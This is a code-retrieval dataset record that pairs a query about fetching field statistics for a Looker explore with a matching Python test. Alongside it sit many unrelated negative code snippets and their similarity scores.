header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['application/json'])\n\n # Authentication setting\n auth_settings = []\n\n return self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='LookmlModelExplore',\n auth_settings=auth_settings,\n callback=params.get('callback'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)", "def _select_fields(self):\r\n return []", "def fields(self) -> Optional[Sequence['outputs.PropertyDefinitionResponse']]:\n return pulumi.get(self, \"fields\")", "def read_fields(self, limit = 0, collapse = False):\r\n\r\n keys = []\r\n probes = {}\r\n\r\n def probe_record(record, parent = None):\r\n for key, value in record.items():\r\n full_key = parent + \".\" + key if parent else key\r\n\r\n if self.expand and type(value) == dict:\r\n probe_record(value, full_key)\r\n continue\r\n\r\n if not full_key in probes:\r\n probe = brewery.dq.FieldTypeProbe(full_key)\r\n probes[full_key] = probe\r\n keys.append(full_key)\r\n else:\r\n probe = probes[full_key]\r\n probe.probe(value)\r\n\r\n count = 0\r\n for record in self.records():\r\n if collapse:\r\n record = collapse_record(record)\r\n\r\n probe_record(record)\r\n if limit and count >= limit:\r\n break\r\n count += 1\r\n\r\n fields = []\r\n\r\n for key in keys:\r\n probe = probes[key]\r\n field = Field(probe.field)\r\n\r\n storage_type = probe.unique_storage_type\r\n if not storage_type:\r\n field.storage_type = \"unknown\"\r\n elif storage_type == \"unicode\":\r\n field.storage_type = \"string\"\r\n else:\r\n field.storage_type = \"unknown\"\r\n field.concrete_storage_type = storage_type\r\n\r\n # FIXME: Set analytical type\r\n\r\n fields.append(field)\r\n\r\n self.fields = list(fields)\r\n return self.fields", "def test_fields(self):\n form = self._get_form(data=None)\n self.assertEquals(len(form.fields), 4)\n self.assertTrue('tests_url' in form.fields)\n self.assertTrue('repo_url' in form.fields)\n self.assertTrue('pkg_type' in form.fields)\n self.assertTrue('tags' in form.fields)", "def get_fields(request):\n\n json_resp = {}\n json_resp['fields'] = []\n json_resp['fields_to_ann'] = []\n all = request.GET.get('all',None)\n workpath = os.path.dirname(os.path.abspath(__file__)) # Returns the Path your .py file is in\n auto_request = request.GET.get('ns_id', None)\n report = request.GET.get('report', None)\n # print(request.session['report_type'])\n if report is not None or all == 'all':\n if report is not None:\n if report.startswith('PUBMED_'):\n json_resp['fields'] = ['volume','authors','year','journal']\n json_resp['fields_to_ann'] = ['title','abstract']\n else:\n json_resp = get_fields_from_json()\n if all == 'all':\n # All the possible fields for every usecase (MANUAL CONFIGURATION)\n json_resp = get_fields_from_json()\n if Report.objects.filter(institute = 'PUBMED').exists():\n json_resp['all_fields'].extend(['title','abstract','volume','journal','year','authors']) #aggiungo pubmed solo in coda!\n else:\n if request.session['report_type'] == 'pubmed':\n json_resp['fields'] = ['volume','authors','year','journal']\n json_resp['fields_to_ann'] = ['title','abstract']\n else:\n # Fileds related exclusively to a usecase\n json_resp = 
get_fields_from_json_configuration(request.session['usecase'],request.session['institute'],request.session['language'])\n if request.session['mode'] == 'Robot' or auto_request == 'Robot':\n with open(os.path.join(workpath, './automatic_annotation/auto_fields/auto_fields.json')) as out:\n data = json.load(out)\n json_resp['fields_to_ann'] = data['extract_fields'][request.session['usecase']]\n for el in json_resp['fields_to_ann']:\n if el in json_resp['fields']:\n json_resp['fields'].remove(el)\n # print('FIELDS', json_resp)\n return JsonResponse(json_resp)", "def pull_fields(self, org):\n pass", "def get_readonly_fields(self, request, obj=None):\n if not self.all_fields_readonly or (request.user.is_superuser and self.superuser_skips_all_readonly):\n return self.readonly_fields\n print self.fieldsets\n print list(set(\n [field.name for field in self.opts.local_fields] +\n [field.name for field in self.opts.local_many_to_many]\n ))\n if self.fieldsets:\n return flatten_fieldsets(self.fieldsets)\n \n else:\n return list(set(\n [field.name for field in self.opts.local_fields] +\n [field.name for field in self.opts.local_many_to_many]\n ))", "def test_get(self):\n simple_fields = {\n \"verbose\": False,\n \"min_core_neighbors\": self.min_core_neighbors,\n \"num_features\": 1,\n \"num_unpacked_features\": 2,\n \"num_distance_components\": 1,\n \"radius\": self.radius,\n \"num_examples\": 30,\n }\n\n for field, ans in simple_fields.items():\n self.assertEqual(self.model._get(field), ans, \"{} failed\".format(field))\n\n _list_fields = {\n \"distance\": self.distance,\n \"unpacked_features\": [\"X1[0]\", \"X1[1]\"],\n \"features\": [\"X1\"],\n }\n\n for field, ans in _list_fields.items():\n self.assertItemsEqual(\n self.model._get(field), ans, \"{} failed\".format(field)\n )\n self.assertGreaterEqual(self.model.training_time, 0)\n self.assertGreaterEqual(self.model.num_clusters, 0)\n self.assertEqual(self.model.cluster_id.num_rows(), 30)", "def test_query_meta(self):\n mdata = QueryMetadata('http://localhost:8181')\n\n mdata.load_meta()\n\n for meta in mdata.meta_list:\n # if this is a user entered field it doesn't need to be filled\n if meta.display_type != \"enter\":\n query = mdata.build_query(meta)\n\n mdata.get_list(query)", "def test_get_flat_fields_setting(self):\n # FormOverrideMixIn.get_flat_fields_setting\n pass", "def get_fieldsets(self, request, obj=None):\n if request.user.user_type == User.ADMIN_CEA:\n return self.cea_fieldsets\n elif request.user.user_type == User.ADMIN_CRC:\n return self.crc_fieldsets\n elif request.user.user_type == User.EXPRESS_USER:\n return self.exp_fieldsets\n return self.fieldsets", "def info(self):\n now = datetime.datetime.now().strftime(\"%Y-%m-%d-%HH-%MM-%SS\")\n print(f\"Exploration info ({now})\")\n print(f\"HDF name: {self.HDF_FILE}\")\n print(f\"Trajectory name: {self.trajectoryName}\")\n if self.model is not None:\n print(f\"Model: {self.model.name}\")\n if hasattr(self, \"nRuns\"):\n print(f\"Number of runs {self.nRuns}\")\n print(f\"Explored parameters: {self.exploreParameters.keys()}\")\n if hasattr(self, \"_t_end_exploration\") and hasattr(self, \"_t_start_exploration\"):\n print(f\"Duration of exploration: {self._t_end_exploration-self._t_start_exploration}\")", "def test_search_maxfeatures_only(objectsearch):\n objectsearch.search(max_features=1)", "def getMeasures():", "def ask_for_field(self, row, col):\n field = self.map.fields[row][col]\n # return the field kind, team, and if there is an entity or not\n return field.passable, field.team, 
field.entity is not None", "def test_get_document_with_fields(index_with_documents):\n response = index_with_documents().get_document(\"500682\", {\"fields\": [\"id\", \"title\"]})\n assert isinstance(response, Document)\n assert hasattr(response, \"title\")\n assert not hasattr(response, \"poster\")\n # assert 'poster' not in response\n assert response.title == \"The Highwaymen\"", "def get_diagnose(visit):\r\n return visit.diagnose.all()", "def experiment_fields(self):\n return {\n 'experiment_name': ['experiments', 'hp_combo_history'],\n 'model_struct': ['experiments', 'hp_combo_history'],\n 'loss_function': ['experiments', 'hp_combo_history'],\n 'regularization_type': ['experiments', 'hp_combo_history'],\n 'regularization_strength': ['experiments', 'hp_combo_history'],\n 'optimizer': ['experiments', 'hp_combo_history'],\n 'lr': ['experiments', 'hp_combo_history'],\n 'dataset': ['experiments', 'hp_combo_history'],\n 'regularization_type_domain': ['experiments', 'hp_combo_history'],\n 'regularization_strength_domain': [\n 'experiments', 'hp_combo_history'],\n 'optimizer_domain': ['experiments', 'hp_combo_history'],\n 'lr_domain': ['experiments', 'hp_combo_history'],\n 'timesteps': ['experiments', 'hp_combo_history'],\n 'timesteps_domain': ['experiments', 'hp_combo_history'],\n 'filter_size': ['experiments', 'hp_combo_history'],\n 'filter_size_domain': ['experiments', 'hp_combo_history'],\n 'u_t_domain': ['experiments', 'hp_combo_history'],\n 'q_t_domain': ['experiments', 'hp_combo_history'],\n 't_t_domain': ['experiments', 'hp_combo_history'],\n 'p_t_domain': ['experiments', 'hp_combo_history'],\n 'u_t': ['experiments', 'hp_combo_history'],\n 'q_t': ['experiments', 'hp_combo_history'],\n 't_t': ['experiments', 'hp_combo_history'],\n 'p_t': ['experiments', 'hp_combo_history'],\n 'hp_optim': ['experiments', 'hp_combo_history'],\n 'hp_max_studies': ['experiments', 'hp_combo_history'],\n 'hp_current_iteration': ['experiments', 'hp_combo_history'],\n 'normalize_labels': ['experiments', 'hp_combo_history'],\n 'experiment_iteration': ['experiments', 'hp_combo_history']\n }", "def EvaluateLocationAndFields(self, *float, **kwargs):\n ...", "def get_fields():\n return jsonify(result=Tree.fields())", "def test_fields(self):\n form = self._get_form(data=None)\n self.assertEquals(len(form.fields), 5)\n self.assertTrue('pkg_type' in form.fields)\n self.assertTrue('name' in form.fields)\n self.assertTrue('tests_url' in form.fields)\n self.assertTrue('repo_url' in form.fields)\n self.assertTrue('tags' in form.fields)", "def test_meta_data_passes_fields(self):\n self.expect_json_http({\"some\": \"value\"},\n uri=re.compile(\".*/articles/1234-56\"))\n\n federalregister.meta_data(\"1234-56\", ['field1', 'field2', 'field3'])\n params = self.last_http_params()\n self.assertEqual(params['fields[]'], ['field1', 'field2', 'field3'])", "def getFieldDetails(self, field_name):\n try:\n value_list = []\n con = self.getMetadataDatabaseConnection()\n results = con.cursor()\n con.cursor().callproc('qiime_assets.get_field_details', [field_name, results])\n\n for row in results:\n # column_name, data_type, desc_or_value, definition, active\n value_list.append((row[0], row[1], row[2], row[3], row[4]))\n \n if len(value_list) == 0:\n # If not found in the dictionary, assume this is a user-created column\n value_list.append((field_name, 'text', '', ''))\n \n return value_list[0]\n except Exception, e:\n print 'Exception caught: %s.\\nThe error is: %s' % (type(e), e)\n return False", "def granule_core_fields(item):\n record 
= {}\n umm = item.get('umm', {})\n record['GranuleUR'] = umm.get('GranuleUR')\n\n meta = item.get('meta', {})\n record['concept-id'] = meta.get('concept-id')\n record['revision-id'] = meta.get('revision-id')\n record['native-id'] = meta.get('native-id')\n return {key: value for key, value in record.items() if value}", "def test_Fieldform_has_fields(self):\n self.assertSequenceEqual(\n [\n \"date\",\n \"start_time\",\n \"end_time\",\n \"temperature\",\n \"humidity\",\n \"coordinator\",\n \"staff\",\n \"parcel_id\",\n ],\n list(self.Fieldform.fields),\n )", "def EvaluateFields(self, *float, **kwargs):\n ...", "def inspect_model_fields(self, model: ModelRepresentation) -> None:\n c = model.count()\n title(f\"{model.name} ({c})\")\n print(model.fields_info())", "def fieldOfView(self):\n return self._fieldOfView", "def _retrieve_fields(self, scope, fields):\r\n if scope == Scope.user_state:\r\n return self._chunked_query(\r\n StudentModule,\r\n 'module_state_key__in',\r\n (descriptor.scope_ids.usage_id for descriptor in self.descriptors),\r\n course_id=self.course_id,\r\n student=self.user.pk,\r\n )\r\n elif scope == Scope.user_state_summary:\r\n return self._chunked_query(\r\n XModuleUserStateSummaryField,\r\n 'usage_id__in',\r\n (descriptor.scope_ids.usage_id for descriptor in self.descriptors),\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n elif scope == Scope.preferences:\r\n return self._chunked_query(\r\n XModuleStudentPrefsField,\r\n 'module_type__in',\r\n set(descriptor.scope_ids.block_type for descriptor in self.descriptors),\r\n student=self.user.pk,\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n elif scope == Scope.user_info:\r\n return self._query(\r\n XModuleStudentInfoField,\r\n student=self.user.pk,\r\n field_name__in=set(field.name for field in fields),\r\n )\r\n else:\r\n return []", "def get_fields(self, resource):\n\n def _get_fields_key(resource):\n \"\"\"Returns the fields key from a resource dict\n\n \"\"\"\n if resource['code'] in [HTTP_OK, HTTP_ACCEPTED]:\n if (MODEL_RE.match(resource_id) or\n ANOMALY_RE.match(resource_id)):\n return resource['object']['model']['model_fields']\n elif CLUSTER_RE.match(resource_id):\n return resource['object']['clusters']['fields']\n elif CORRELATION_RE.match(resource_id):\n return resource['object']['correlations']['fields']\n elif STATISTICAL_TEST_RE.match(resource_id):\n return resource['object']['statistical_tests']['fields']\n elif STATISTICAL_TEST_RE.match(resource_id):\n return resource['object']['statistical_tests']['fields']\n elif LOGISTIC_REGRESSION_RE.match(resource_id):\n return resource['object']['logistic_regression']['fields']\n elif ASSOCIATION_RE.match(resource_id):\n return resource['object']['associations']['fields']\n elif SAMPLE_RE.match(resource_id):\n return dict([(field['id'], field) for field in\n resource['object']['sample']['fields']])\n else:\n return resource['object']['fields']\n return None\n\n if isinstance(resource, dict) and 'resource' in resource:\n resource_id = resource['resource']\n elif (isinstance(resource, basestring) and (\n SOURCE_RE.match(resource) or DATASET_RE.match(resource) or\n MODEL_RE.match(resource) or PREDICTION_RE.match(resource))):\n resource_id = resource\n resource = self._get(\"%s%s\" % (self.url, resource_id))\n else:\n LOGGER.error(\"Wrong resource id\")\n return\n # Tries to extract fields information from resource dict. 
If it fails,\n # a get remote call is used to retrieve the resource by id.\n fields = None\n try:\n fields = _get_fields_key(resource)\n except KeyError:\n resource = self._get(\"%s%s\" % (self.url, resource_id))\n fields = _get_fields_key(resource)\n\n return fields", "def get_fields(self):\n\n return self.get_coverage_rangetype()", "def get_viewable_explorations(user_id):\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_viewable_explorations(user_id)]", "def get_fields(model, fields=None):\n include = [f.strip() for f in fields.split(',')] if fields else None\n return utils.get_fields(\n model,\n include\n )", "def _get_repr_body_fields(self) -> List[Tuple[str, Union[str, int, List[str]]]]:\n # Set up fields\n fields = {\n \"Uploader Name\": self.uploader_name,\n \"Metric\": self.task_evaluation_measure,\n \"Run ID\": self.run_id,\n \"Task ID\": self.task_id,\n \"Task Type\": self.task_type,\n \"Task URL\": openml.tasks.OpenMLTask.url_for_id(self.task_id),\n \"Flow ID\": self.flow_id,\n \"Flow Name\": self.flow_name,\n \"Flow URL\": openml.flows.OpenMLFlow.url_for_id(self.flow_id),\n \"Setup ID\": self.setup_id,\n \"Setup String\": self.setup_string,\n \"Dataset ID\": self.dataset_id,\n \"Dataset URL\": openml.datasets.OpenMLDataset.url_for_id(self.dataset_id),\n }\n\n # determines the order of the initial fields in which the information will be printed\n order = [\"Uploader Name\", \"Uploader Profile\", \"Metric\", \"Result\"]\n\n if self.uploader is not None:\n fields[\"Uploader Profile\"] = \"{}/u/{}\".format(\n openml.config.get_server_base_url(), self.uploader\n )\n if self.run_id is not None:\n fields[\"Run URL\"] = self.openml_url\n if self.evaluations is not None and self.task_evaluation_measure in self.evaluations:\n fields[\"Result\"] = self.evaluations[self.task_evaluation_measure]\n elif self.fold_evaluations is not None:\n # -- Add locally computed summary values if possible\n if \"predictive_accuracy\" in self.fold_evaluations:\n # OpenMLClassificationTask; OpenMLLearningCurveTask\n # default: predictive_accuracy\n result_field = \"Local Result - Accuracy (+- STD)\"\n fields[result_field] = self._evaluation_summary(\"predictive_accuracy\")\n order.append(result_field)\n elif \"mean_absolute_error\" in self.fold_evaluations:\n # OpenMLRegressionTask\n # default: mean_absolute_error\n result_field = \"Local Result - MAE (+- STD)\"\n fields[result_field] = self._evaluation_summary(\"mean_absolute_error\")\n order.append(result_field)\n\n if \"usercpu_time_millis\" in self.fold_evaluations:\n # Runtime should be available for most tasks types\n rt_field = \"Local Runtime - ms (+- STD)\"\n fields[rt_field] = self._evaluation_summary(\"usercpu_time_millis\")\n order.append(rt_field)\n\n # determines the remaining order\n order += [\n \"Run ID\",\n \"Run URL\",\n \"Task ID\",\n \"Task Type\",\n \"Task URL\",\n \"Flow ID\",\n \"Flow Name\",\n \"Flow URL\",\n \"Setup ID\",\n \"Setup String\",\n \"Dataset ID\",\n \"Dataset URL\",\n ]\n return [(key, fields[key]) for key in order if key in fields]", "def validate(self, mode: QueryMode = \"batch\") -> Dict[str, Any]:\n self._query_by_task_id = {}\n explore_count = self._count_explores()\n printer.print_header(\n f\"Testing {explore_count} \"\n f\"{'explore' if explore_count == 1 else 'explores'} \"\n f\"[{mode} mode] \"\n f\"[concurrency = {self.query_slots}]\"\n )\n\n self._create_and_run(mode)\n if mode == \"hybrid\" and self.project.errored:\n self._create_and_run(mode)\n\n for model in 
sorted(self.project.models, key=lambda x: x.name):\n for explore in sorted(model.explores, key=lambda x: x.name):\n message = f\"{model.name}.{explore.name}\"\n printer.print_validation_result(\n passed=not explore.errored, source=message\n )\n\n return self.project.get_results(mode)", "def trace_all_fields(opt_model):\n osp = opt_model.optical_spec\n fld, wvl, foc = osp.lookup_fld_wvl_focus(0)\n fset = []\n for f in osp.field_of_view.fields:\n rset = trace_field(opt_model, f, wvl, foc)\n fset.append(rset)\n\n fdf = pd.concat(fset, keys=osp.field_of_view.index_labels,\n names=['field'])\n return fdf", "def test_get_interesting_mapping_fields(self):\r\n # all columns are completely unique\r\n d = parse_mapping_file(self.mapping_f1)\r\n actual = get_interesting_mapping_fields(d[0], d[1])\r\n expected = []\r\n self.assertEqual(actual, expected)\r\n\r\n # all columns are completely identical\r\n d = parse_mapping_file(self.mapping_f2)\r\n actual = get_interesting_mapping_fields(d[0], d[1])\r\n expected = []\r\n self.assertEqual(actual, expected)\r\n\r\n # some columns retained\r\n d = parse_mapping_file(self.mapping_f3)\r\n actual = get_interesting_mapping_fields(d[0], d[1])\r\n expected = ['Something', 'days_since_epoch']\r\n self.assertEqual(actual, expected)", "def describe_fields(self):\n opened_file = self.data\n description = []\n\n if not opened_file:\n opened_file = self.open()\n\n for n in range(0, opened_file.GetLayerCount()):\n layer = opened_file.GetLayer(n)\n layer_description = {'name': layer.GetName(),\n 'feature_count': layer.GetFeatureCount(),\n 'fields': [],\n 'index': n,\n 'geom_type': self.geometry_type(layer.GetGeomType())\n }\n\n layer_definition = layer.GetLayerDefn()\n for i in range(layer_definition.GetFieldCount()):\n field_desc = {}\n field = layer_definition.GetFieldDefn(i)\n field_desc['name'] = field.GetName()\n field_desc['type'] = field.GetFieldTypeName(i)\n layer_description['fields'].append(field_desc)\n\n description.append(layer_description)\n\n return description", "def test_getknowndata(self):\n result = recordparser.getfields(self.rawdata, self.fieldmap,\n self.sourcekeys)\n self.assertEqual(self.knownvalues, result)", "def get_fields(self, request, obj=None):\n if obj:\n return self.fields\n return self.add_fields", "def get_fields():\n if not request.is_xhr:\n abort(403)\n fields = Field.query.all()\n result = {field.id:field.name for field in fields}\n return jsonify(result)", "def test_max_features_first_page(\n self, mp_wfs, mp_get_schema, mp_remote_describefeaturetype,\n mp_wfs_max_features, mp_remote_wfs_paged_feature):\n s = BoringSearch()\n df = s.search(return_fields=['pkey_boring'], max_features=5)\n assert len(df) == 5", "def _explore(self, explore_iterable):\n if self.v_locked:\n raise pex.ParameterLockedException(\n \"Parameter `%s` is locked!\" % self.v_full_name\n )\n\n if self.f_has_range():\n raise TypeError(\n \"Your parameter `%s` is already explored, \"\n \"cannot _explore it further!\" % self._name\n )\n\n if self._data is None:\n raise TypeError(\n \"Your parameter `%s` has no default value, please specify one \"\n \"via `f_set` before exploration. 
\" % self.v_full_name\n )\n\n data_list = self._data_sanity_checks(explore_iterable)\n\n self._explored_range = data_list\n self._explored = True\n self.f_lock()", "def fields(self):\r\n if not hasattr(self, '_fields'):\r\n self._fields = dict((clean_field_title(pc.title), pc.get_content())\r\n for pc in self.pagecontent_set.all())\r\n\r\n return self._fields", "def advanced_features(self):\n return self._advanced_features", "def __getattribute__(self, name: str) -> Any:\n if name in (FLD_TITLE, FLD_ABSTRACT, FLD_FEES, FLD_ACCESS_CONSTRAINTS, FLD_CONTACT_POSITION, FLD_CONTACT_ORGANISATION):\n return self.read_local_metadata(name)\n elif name == FLD_KEYWORDS:\n kw = self.read_local_metadata(FLD_KEYWORDS)\n if kw:\n return set(kw.split(\",\"))\n else:\n return set()\n elif name == FLD_ATTRIBUTION:\n return self.read_local_metadata(FLD_ATTRIBUTION)\n else:\n return super().__getattribute__(name)", "def getexperimentinfo(expid):\n rdata = {}\n rdata['expId'] = expid\n res = requests.get(scbd_server_address + '/experiments/get_details', json=rdata)\n if res.status_code == 200:\n outstr = ''\n for cres in res.json()['details']:\n outstr += cres[0] + ':' + cres[1] + '<br>'\n # details=res.json()['details']\n return outstr\n return []", "def fields(self):\n if self._fields is None:\n self._init_fields()\n return self._fields" ]
[ "0.79898906", "0.7255912", "0.57427955", "0.5689888", "0.5485005", "0.544207", "0.5428259", "0.54008704", "0.5328612", "0.52564484", "0.5198791", "0.5090246", "0.5081006", "0.5072066", "0.50549966", "0.5046278", "0.49843732", "0.49804208", "0.49604252", "0.49604252", "0.49590856", "0.49215195", "0.49204257", "0.4919356", "0.49069488", "0.49057347", "0.48774806", "0.4862115", "0.48620763", "0.4860669", "0.48556656", "0.48417893", "0.48257262", "0.48104766", "0.4809317", "0.48083636", "0.48075446", "0.4805631", "0.4793343", "0.4783424", "0.47833648", "0.47669962", "0.4765332", "0.47533843", "0.47499633", "0.47422874", "0.47340128", "0.4726814", "0.47238484", "0.47170094", "0.46878967", "0.46850488", "0.46741295", "0.46721247", "0.4667797", "0.46665743", "0.46659198", "0.46539533", "0.46481672", "0.46439442", "0.4640407", "0.4622399", "0.45998886", "0.45974737", "0.45742458", "0.45700583", "0.4567617", "0.45631483", "0.45602584", "0.45508465", "0.45461255", "0.45337853", "0.45325878", "0.45290387", "0.45233563", "0.45228484", "0.4517839", "0.45158824", "0.45077515", "0.45014817", "0.44946963", "0.4488805", "0.4488432", "0.44847217", "0.44836968", "0.44814596", "0.44764274", "0.4474963", "0.44734204", "0.44696575", "0.44675663", "0.44564924", "0.44558954", "0.44557077", "0.4450573", "0.44456387", "0.44428995", "0.4441316", "0.44363564", "0.44270426" ]
0.81051433
0
fetcher.get_explore_field_stats() should get the stats of all fields in an explore.
def test_get_explore_field_stats( fc: fetcher.Fetcher, looker_sdk: methods.Looker40SDK, test_model, test_used_explore_names, test_explores_stats, ): explore = fc.get_explores( model=test_model["name"], explore=test_used_explore_names[0] )[0] actual_stats = fc.get_explore_field_stats(explore) assert isinstance(actual_stats, dict) for e in test_explores_stats: if e["name"] == test_used_explore_names[0]: expected_stats = e assert all(actual_stats[k] == 0 for k in expected_stats["unused_fields"]) assert all(actual_stats[k] > 0 for k in expected_stats["used_fields"])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_explore_fields_gets_fields(\n fc: fetcher.Fetcher, test_model, test_explores_stats\n):\n test_explore = test_explores_stats[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=test_explore[\"name\"])\n assert isinstance(explore, list)\n explore = explore[0]\n assert isinstance(explore, models.LookmlModelExplore)\n assert explore.model_name == test_model[\"name\"]\n assert explore.name == test_explore[\"name\"]\n fields = fc.get_explore_fields(explore)\n assert isinstance(fields, list)\n assert fields == test_explore[\"all_fields\"]", "def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores(\n fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores\n):\n expected = test_dimensions_or_measures_only_explores[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=expected[\"name\"])\n assert isinstance(explore, list)\n actual = explore[0]\n assert actual.name == expected[\"name\"]\n assert not (actual.fields.dimensions and actual.fields.measures)\n expected_fields = [f[\"name\"] for f in expected[\"fields\"]]\n actual_fields = fc.get_explore_fields(actual)\n assert actual_fields == expected_fields", "def listFields(self):\n return self.get_json('/field')", "def _field_extract(url):\n logging.info('extracting player stats from url: {}'.format(url))\n player_summary = requests.get(url)\n parser = BeautifulSoup(player_summary.content, 'html.parser')\n player_profile = parser.select('tr')\n list_of_fields = ['Innings', 'Not Outs', 'Aggregate', 'Highest Score', '50s', '100s', 'Ducks', '4s',\n '6s', 'Scoring Rate', 'Overs', 'Runs Conceded', 'Wickets', 'Average', '4 Wickets in Innings',\n '5 Wickets in Innings', 'Best', 'Economy Rate', 'Strike Rate', 'Catches',\n 'Most Catches in Innings', 'Stumpings', 'Most Catches in Innings',\n 'Most Dismissals in Innings',\n 'Won/Lost', 'Matches/Won/Lost', 'Tosses Won', 'Runs Scored', 'Batting Average']\n mapped_fields = {} # holds series level stats\n stats_header = '' # holds series stats metric header\n for each_field in range(0, len(player_profile)):\n # get stats header\n try:\n stats = player_profile[each_field].select_one('.ProfileSection').text.strip()\n if stats in ['Batting', 'Fielding', 'Bowling', 'Wicket Keeping', 'Captaincy']:\n stats_header = stats\n except Exception as e:\n str(e) # just ignore the exception\n # update stats data\n try:\n field = player_profile[each_field].select_one('.FieldName').text.split(':')[0]\n value = player_profile[each_field].select_one('.FieldValue').text.strip()\n if field in list_of_fields:\n mapped_fields['{}_{}'.format(stats_header.lower(), field.replace(' ', '_').lower())] = value\n except AttributeError as ae:\n logging.info('skip: May be html tree doesn\\'t find search - {}'.format(ae))\n logging.info('extract completed for url: {} ..... 
/200'.format(url))\n return mapped_fields", "def field():\n data = request.get_json()\n return jsonify(result=Statistics.field_type_count(data['field']))", "def fields(self):\n ...", "def get_fields(self, path):\n with self.inspector(path) as opened_file:\n return opened_file.describe_fields()", "def fields(self):", "def test_get_explore_join_stats(fc: fetcher.Fetcher, test_model):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=\"explore_2_joins_1_used\"\n )[0]\n field_stats = {\n \"explore_2_joins_1_used.d1\": 10,\n \"explore_2_joins_1_used.d2\": 5,\n \"explore_2_joins_1_used.d3\": 0,\n \"explore_2_joins_1_used.m1\": 0,\n \"join1.d1\": 10,\n \"join1.d2\": 10,\n \"join1.d3\": 10,\n \"join1.m1\": 0,\n \"join2.d1\": 0,\n \"join2.d2\": 0,\n \"join2.d3\": 0,\n \"join2.m1\": 0,\n }\n join_stats = fc.get_explore_join_stats(explore=explore, field_stats=field_stats)\n assert isinstance(join_stats, dict)\n assert len(join_stats) == 2\n assert join_stats == {\"join1\": 30, \"join2\": 0}", "def get_fields(self, pager=None):\n return Field.deserialize_list(self._get_multiple('fields', {}, pager))", "def readAccessedFields(self):\n pass", "def _get_fields(self):\n return self._fields", "def _field_stat(self, field):\r\n if not field in self.stats:\r\n stat = dq.FieldStatistics(field, distinct_threshold = self.distinct_threshold)\r\n self.stats[field] = stat\r\n else:\r\n stat = self.stats[field]\r\n return stat", "def field(field_id):\n if not request.is_xhr:\n abort(403)\n\n if field_id == 0:\n field_id = session.get('current_field_id', 2)\n\n session['current_field_id'] = field_id\n state = {\n 'status': 0,\n 'field_size': 0,\n 'fox_count': 0,\n 'foxes': [],\n 'start_time': 0,\n 'end_time': 0,\n 'shot_count': 0,\n 'last_shot_result': '',\n 'hits': 0,\n 'is_in_top_10': False,\n }\n field = Field.query.get(field_id)\n state['field_size'] = field.size\n state['fox_count'] = field.fox_count\n\n installed_foxes = 0\n foxes = []\n random.seed()\n while installed_foxes < field.fox_count:\n x = random.randrange(field.size)\n y = random.randrange(field.size)\n fox = {\n 'x': x,\n 'y': y,\n }\n if fox in foxes:\n continue\n foxes.append(fox)\n installed_foxes += 1\n\n state['foxes'] = foxes\n session['state'] = state\n\n result = state.copy()\n del result['foxes'] # We don't want to spoil foxes' positions\n\n return jsonify(result)", "def field_names(self):\n ...", "def _get_all_field_functions(self):\n get_url = 'v1/fieldFunctions'\n self.field_functions = {f['mdmId']: f for f in self.carol.call_api(get_url, params=dict(pageSize=-1))['hits']}\n self.field_functions_id = {f['mdmName']: f['mdmId'] for f in self.field_functions.values()}", "def fields(request):\n fields = request.GET.getlist('field')\n response = {}\n if 'reviewers' in fields:\n response['reviewers'] = request.issue.reviewers or []\n if 'description' in fields:\n response['description'] = request.issue.description\n if 'subject' in fields:\n response['subject'] = request.issue.subject\n return response", "def get_query_fields(cls):\n ...", "def Fields(self):\n return self._fields", "def fields(self):\r\n pass", "def fields(self):\r\n return self._by_name.iteritems()", "def get_field_values(self, index, field, **kwargs):\n search = self._build_search(index, **kwargs)\n search.aggs.bucket('fieldCounts', 'terms', field=field, size=10000)\n fieldValues = {}\n for bucket in search.execute().aggregations.fieldCounts.buckets:\n fieldValues[bucket.key] = bucket.doc_count\n return fieldValues", "def get_fields(self):\r\n return 
self.fields", "def read_fields(self, limit = 0, collapse = False):\r\n\r\n keys = []\r\n probes = {}\r\n\r\n def probe_record(record, parent = None):\r\n for key, value in record.items():\r\n full_key = parent + \".\" + key if parent else key\r\n\r\n if self.expand and type(value) == dict:\r\n probe_record(value, full_key)\r\n continue\r\n\r\n if not full_key in probes:\r\n probe = brewery.dq.FieldTypeProbe(full_key)\r\n probes[full_key] = probe\r\n keys.append(full_key)\r\n else:\r\n probe = probes[full_key]\r\n probe.probe(value)\r\n\r\n count = 0\r\n for record in self.records():\r\n if collapse:\r\n record = collapse_record(record)\r\n\r\n probe_record(record)\r\n if limit and count >= limit:\r\n break\r\n count += 1\r\n\r\n fields = []\r\n\r\n for key in keys:\r\n probe = probes[key]\r\n field = Field(probe.field)\r\n\r\n storage_type = probe.unique_storage_type\r\n if not storage_type:\r\n field.storage_type = \"unknown\"\r\n elif storage_type == \"unicode\":\r\n field.storage_type = \"string\"\r\n else:\r\n field.storage_type = \"unknown\"\r\n field.concrete_storage_type = storage_type\r\n\r\n # FIXME: Set analytical type\r\n\r\n fields.append(field)\r\n\r\n self.fields = list(fields)\r\n return self.fields", "def get_fields(self, key=None):\n return self._get_query('fields', self._build_params(key=key), Field)", "def EvaluateFields(self, *float, **kwargs):\n ...", "def fields(self, _only_called=False, **kwargs):\n\n # Check for an operator and transform to mongo-style if there is one\n operators = [\"slice\"]\n cleaned_fields = []\n for key, value in kwargs.items():\n parts = key.split(\"__\")\n if parts[0] in operators:\n op = parts.pop(0)\n value = {\"$\" + op: value}\n\n key = \".\".join(parts)\n try:\n field_name, value = self._check_valid_field_name_to_project(key, value)\n except ValueError as e:\n raise e\n\n cleaned_fields.append((field_name, value))\n\n # divide fields on groups by their values\n # (ONLY group, EXCLUDE group etc.) 
